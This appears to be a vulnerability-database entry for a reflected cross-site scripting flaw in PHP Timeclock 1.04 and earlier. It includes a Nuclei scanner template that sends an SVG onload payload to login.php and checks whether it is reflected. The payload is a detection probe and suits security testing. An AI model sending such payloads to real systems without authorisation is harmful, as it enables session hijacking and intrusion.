php-timeclock-xss: PHP Timeclock <=1.04 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: PHP Timeclock | POC: 已公开

漏洞描述

PHP Timeclock 1.04 and prior contains multiple cross-site scripting vulnerabilities via login.php, timeclock.php, reports/audit.php. and reports/timerpt.php

PoC代码[已公开]

id: php-timeclock-xss

info:
  name: PHP Timeclock <=1.04 - Cross-Site Scripting
  author: pikpikcu
  severity: high
  description: PHP Timeclock 1.04 and prior contains multiple cross-site scripting vulnerabilities via login.php, timeclock.php, reports/audit.php. and reports/timerpt.php
  reference:
    - https://www.exploit-db.com/exploits/49853
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: xss,php,timeclock,edb,intrusive,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/login.php/'%3E%3Csvg/onload=alert%60{{randstr}}%60%3E"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<svg/onload=alert`{{randstr}}`>"
          - "PHP Timeclock Admin Login"
        part: body
        condition: and

      - type: word
        words:
          - "text/html"
        part: header
# digest: 4a0a00473045022100cfb64c2a98c2aa8e3b3d30a35a9dd3e5224f757bf989c7fa43e8f7b3ad3a317c02206881c753c42664dd4242418aab6dcdc1b4b09bc25941d8742503864eabcccc08:922c64590222798bb761d5b6d8e72950